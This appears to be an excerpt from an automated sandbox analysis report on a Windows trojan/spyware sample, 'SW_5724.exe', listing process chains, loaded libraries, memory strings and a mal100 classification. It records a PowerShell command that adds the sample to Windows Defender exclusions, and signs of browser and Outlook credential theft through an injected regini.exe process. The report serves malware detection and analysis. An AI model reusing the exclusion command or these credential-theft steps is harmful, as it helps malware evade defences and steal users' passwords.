                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8B1B010_2_02D8B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E4B16B10_2_02E4B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D6F17210_2_02D6F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB516C10_2_02DB516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E316CC10_2_02E316CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC563010_2_02DC5630
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3F7B010_2_02E3F7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7146010_2_02D71460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3F43F10_2_02E3F43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E495C310_2_02E495C3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1D5B010_2_02E1D5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3757110_2_02E37571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2DAC610_2_02E2DAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E21AA310_2_02E21AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1DAAC10_2_02E1DAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC5AA010_2_02DC5AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E37A4610_2_02E37A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FA4910_2_02E3FA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF3A6C10_2_02DF3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DBDBF910_2_02DBDBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF5BF010_2_02DF5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9FB8010_2_02D9FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FB7610_2_02E3FB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D838E010_2_02D838E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DED80010_2_02DED800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8995010_2_02D89950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9B95010_2_02D9B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1591010_2_02E15910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D89EB010_2_02D89EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D43FD510_2_02D43FD5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D43FD210_2_02D43FD2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D81F9210_2_02D81F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FFB110_2_02E3FFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FF0910_2_02E3FF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3FCF210_2_02E3FCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF9C3210_2_02DF9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9FDC010_2_02D9FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E37D7310_2_02E37D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D83D4010_2_02D83D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E31D5A10_2_02E31D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00471EA010_2_00471EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046CD8C10_2_0046CD8C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046CD9010_2_0046CD90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046AFB010_2_0046AFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046CFB010_2_0046CFB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046B0F410_2_0046B0F4
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046B10010_2_0046B100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0046137910_2_00461379
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047555010_2_00475550
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047374B10_2_0047374B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047375010_2_00473750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0048BD4010_2_0048BD40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAE3A810_2_02BAE3A8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAE4C510_2_02BAE4C5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BACBB810_2_02BACBB8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAE85C10_2_02BAE85C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02BAD92810_2_02BAD928
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DB5130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02D6B970 appears 280 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DEEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DC7E54 appears 111 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02DFF290 appears 105 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01A4B970 appears 280 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01A95130 appears 58 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01ACEA12 appears 86 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01AA7E54 appears 111 times
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: String function: 01ADF290 appears 105 times
                Source: SW_5724.exe, 00000000.00000002.2102976278.0000000009330000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2100862691.0000000007770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2086821839.00000000041D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2082673604.00000000029D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2086821839.0000000004211000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2102696975.000000000800D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000002.2079014451.0000000000BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SW_5724.exe
                Source: SW_5724.exe, 00000000.00000000.2044584459.0000000000552000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameqGyw.exe0 vs SW_5724.exe
                Source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREGINI.EXEj% vs SW_5724.exe
                Source: SW_5724.exe, 00000006.00000002.2336234768.0000000001B4D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SW_5724.exe
                Source: SW_5724.exeBinary or memory string: OriginalFilenameqGyw.exe0 vs SW_5724.exe
                Source: SW_5724.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SW_5724.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, qimOJmLpbCtpRP9n6S.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, qimOJmLpbCtpRP9n6S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, qimOJmLpbCtpRP9n6S.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, qimOJmLpbCtpRP9n6S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, qimOJmLpbCtpRP9n6S.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SW_5724.exe.9330000.6.raw.unpack, qimOJmLpbCtpRP9n6S.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.44dcf70.0.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SW_5724.exe.4451f50.3.raw.unpack, ihdZojCtJ78sVpQg9k.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/7@15/9
                Source: C:\Users\user\Desktop\SW_5724.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SW_5724.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Users\user\Desktop\SW_5724.exeMutant created: \Sessions\1\BaseNamedObjects\cgFkuNI
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ty1tgju.kpa.ps1Jump to behavior
                Source: SW_5724.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SW_5724.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SW_5724.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: regini.exe, 0000000A.00000003.2632666532.0000000002979000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2632759668.0000000002965000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4514767041.0000000002965000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4514767041.000000000299A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SW_5724.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeProcess created: C:\Users\user\Desktop\SW_5724.exe "C:\Users\user\Desktop\SW_5724.exe"Jump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeProcess created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\regini.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SW_5724.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SW_5724.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SW_5724.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SW_5724.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BmUrsTIvMw.exe, 00000009.00000002.4514409614.000000000019E000.00000002.00000001.01000000.0000000C.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4514410674.000000000019E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SW_5724.exe, SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
